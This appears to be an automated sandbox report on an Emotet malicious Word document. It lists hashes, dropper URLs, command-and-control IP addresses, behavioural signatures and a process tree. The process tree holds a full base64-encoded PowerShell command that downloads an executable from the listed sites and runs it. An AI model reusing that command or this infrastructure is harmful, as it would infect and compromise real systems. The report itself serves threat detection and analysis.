Analysis
-
max time kernel
144s -
max time network
147s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
28-07-2020 20:05
Static task
static1
Behavioral task
behavioral1
Sample
emotet_e2_0f3d19d2092e84e52aa8eec6d932f177849ae15bd1febf920b40e980de9aeb97_2020-07-28__200502._doc.doc
Resource
win7
General
-
Target
emotet_e2_0f3d19d2092e84e52aa8eec6d932f177849ae15bd1febf920b40e980de9aeb97_2020-07-28__200502._doc.doc
-
Size
170KB
-
MD5
05e380652838eebf3720b81e1d953e0e
-
SHA1
6268484debb275001b13894bc057f17f4610d39c
-
SHA256
0f3d19d2092e84e52aa8eec6d932f177849ae15bd1febf920b40e980de9aeb97
-
SHA512
aa9842259151c4dfeee679561a9928f80c5ea7ba7ef930d9b01d309dd473c5b9ff037529b4eb03e5bdecdf53b6c2e854d6f529f428c16f20ea3ccb03c1807f48
Malware Config
Extracted
http://bunchproperties.com/lyhvmiq/s_ia_4uaq/
http://badeggdesign.com/cgi-bin/nxr5_o_d6vmj/
http://calledtochange.org/calledtochange/0_76zqg_bwnxpr84/
http://www.cinefamily.org/phpMyAdmin-4.7.9-all-languages/5um_oot_hz8/
http://bodbderg.net/wp-admin/ogfv5_4_x2l/
Extracted
emotet
76.27.179.47:80
212.51.142.238:8080
189.212.199.126:443
61.19.246.238:443
162.154.38.103:80
91.211.88.52:7080
83.110.223.58:443
124.45.106.173:443
116.203.32.252:8080
109.117.53.230:443
5.196.74.210:8080
75.139.38.211:80
168.235.67.138:7080
176.111.60.55:8080
169.239.182.217:8080
74.208.45.104:8080
31.31.77.83:443
222.214.218.37:4143
37.139.21.175:8080
91.205.215.66:443
93.156.165.186:80
78.24.219.147:8080
87.106.136.232:8080
87.106.139.101:8080
81.2.235.111:8080
62.75.141.82:80
181.230.116.163:80
95.9.185.228:443
173.91.22.41:80
153.126.210.205:7080
113.160.130.116:8443
190.55.181.54:443
137.59.187.107:8080
209.182.216.177:443
91.231.166.124:8080
95.179.229.244:8080
201.173.217.124:443
5.39.91.110:7080
109.74.5.95:8080
104.131.11.150:443
104.236.246.93:8080
209.141.54.221:8080
95.213.236.64:8080
210.165.156.91:80
46.105.131.79:8080
24.43.99.75:80
203.153.216.189:7080
180.92.239.110:8080
62.138.26.28:8080
104.131.44.150:8080
139.130.242.43:80
79.98.24.39:8080
41.60.200.34:80
93.51.50.171:8080
47.153.182.47:80
185.94.252.104:443
71.208.216.10:80
200.41.121.90:80
70.167.215.250:8080
121.124.124.40:7080
157.245.99.39:8080
139.59.60.244:8080
103.86.49.11:8080
50.116.86.205:8080
46.105.131.87:80
162.241.92.219:8080
152.168.248.128:443
200.55.243.138:8080
190.160.53.126:80
24.234.133.205:80
37.187.72.193:8080
108.48.41.69:80
110.145.77.103:80
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 3892 853.exe 1776 dssec.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 3892 wrote to memory of 1776 3892 853.exe 78 PID 3892 wrote to memory of 1776 3892 853.exe 78 PID 3892 wrote to memory of 1776 3892 853.exe 78 -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\tbs\dssec.exe 853.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 2264 powersheLL.exe 2264 powersheLL.exe 2264 powersheLL.exe 1776 dssec.exe 1776 dssec.exe 1776 dssec.exe 1776 dssec.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 3876 WINWORD.EXE 3876 WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2264 1000 powersheLL.exe 66 -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2264 powersheLL.exe -
Blacklisted process makes network request 1 IoCs
flow pid Process 23 2264 powersheLL.exe -
Emotet Payload 2 IoCs
Detects Emotet payload in memory.
resource yara_rule behavioral2/memory/3892-9-0x0000000000AE0000-0x0000000000AEC000-memory.dmp emotet behavioral2/memory/1776-12-0x0000000000710000-0x000000000071C000-memory.dmp emotet -
Suspicious use of SetWindowsHookEx 13 IoCs
pid Process 3876 WINWORD.EXE 3876 WINWORD.EXE 3876 WINWORD.EXE 3876 WINWORD.EXE 3876 WINWORD.EXE 3876 WINWORD.EXE 3876 WINWORD.EXE 3876 WINWORD.EXE 3876 WINWORD.EXE 3892 853.exe 3892 853.exe 1776 dssec.exe 1776 dssec.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e2_0f3d19d2092e84e52aa8eec6d932f177849ae15bd1febf920b40e980de9aeb97_2020-07-28__200502._doc.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3876
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABVAEYAQgBJAEkAbABpAGkAPQAnAEcASABBAE8ARQBsAHoAbwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAQwBVAGAAUgBpAGAAVABgAFkAUABSAG8AYABUAG8AQwBvAEwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABTAFcARQBSAEwAcQBiAHoAIAA9ACAAJwA4ADUAMwAnADsAJABIAEcATgBQAEsAcwB1AG0APQAnAE0ASABYAFoAQwBkAGcAbAAnADsAJABOAFQAVwBYAFoAbgBqAHgAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFMAVwBFAFIATABxAGIAegArACcALgBlAHgAZQAnADsAJABGAEsATABQAFIAbgBjAHAAPQAnAEUAUgBUAFMAWAB1AG8AcwAnADsAJABKAEQAVQBGAEIAdABjAHAAPQAuACgAJwBuAGUAJwArACcAdwAtACcAKwAnAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQB0AC4AdwBFAEIAQwBMAGkAZQBOAFQAOwAkAEUARgBCAFkASABoAG4AaQA9ACcAaAB0AHQAcAA6AC8ALwBiAHUAbgBjAGgAcAByAG8AcABlAHIAdABpAGUAcwAuAGMAbwBtAC8AbAB5AGgAdgBtAGkAcQAvAHMAXwBpAGEAXwA0AHUAYQBxAC8AKgBoAHQAdABwADoALwAvAGIAYQBkAGUAZwBnAGQAZQBzAGkAZwBuAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AbgB4AHIANQBfAG8AXwBkADYAdgBtAGoALwAqAGgAdAB0AHAAOgAvAC8AYwBhAGwAbABlAGQAdABvAGMAaABhAG4AZwBlAC4AbwByAGcALwBjAGEAbABsAGUAZAB0AG8AYwBoAGEAbgBnAGUALwAwAF8ANwA2AHoAcQBnAF8AYgB3AG4AeABwAHIAOAA0AC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AYwBpAG4AZQBmAGEAbQBpAGwAeQAuAG8AcgBnAC8AcABoAHAATQB5AEEAZABtAGkAbgAtADQALgA3AC4AOQAtAGEAbABsAC0AbABhAG4AZwB1AGEAZwBlAHMALwA1AHUAbQBfAG8AbwB0AF8AaAB6ADgALwAqAGgAdAB0AHAAOgAvAC8AYgBvAGQAYgBkAGUAcgBnAC4AbgBlAHQALwB3AHAALQBhAGQAbQBpAG4ALwBvAGcAZgB2ADUAXwA0AF8AeAAyAGwALwAnAC4AIgBzAGAAcABsAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEcAUABRAFEATgB6AHAAdwA9ACcASgBIAFkASwBZAGEAZwBqACcAOwBmAG8AcgBlAGEAYwBoACgAJABEAFQATgBCAEMAZgBiAHEAIABpAG4AIAAkAEUARgBCAFkASABoAG4AaQApAHsAdAByAHkAewAkAEoARABVAEYAQgB0AGMAcAAuACIAZABPAHcATgBgAEwAbwBgAEEAZABgAEYASQBsAEUAIgAoACQARABUAE4AQgBDAGYAYgBxACwAIAAkAE4AVABXAFgAWgBuAGoAeAApADsAJABDAFMAUABBAE0AdQBkAHEAPQAnAFoAVABLAEQATABrAGkAegAnADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAE4AVABXAFgAWgBuAGoAeAApAC4AIgBMAEUATgBgAGcAYABUAEgAIgAgAC0AZwBlACAAMwA2ADQANwA1ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAGAAUgBlAGEAYABUAEUAIgAoACQATgBUAFcAWABaAG4AagB4ACkAOwAkAFAAWABMAFoAVQB1AHQAaAA9ACcAVABUAFQATABOAGkAbQBhACcAOwBiAHIAZQBhAGsAOwAkAEcAQwBXAE0AVwBlAHEAYwA9ACcARwBXAE8AQwBZAGUAZgB0ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAUwBVAEYAVABtAG0AeAA9ACcARwBJAFcAVQBZAGoAZAB0ACcA1⤵
- Suspicious behavior: EnumeratesProcesses
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
PID:2264
-
C:\Users\Admin\853.exeC:\Users\Admin\853.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:3892 -
C:\Windows\SysWOW64\tbs\dssec.exe"C:\Windows\SysWOW64\tbs\dssec.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1776
-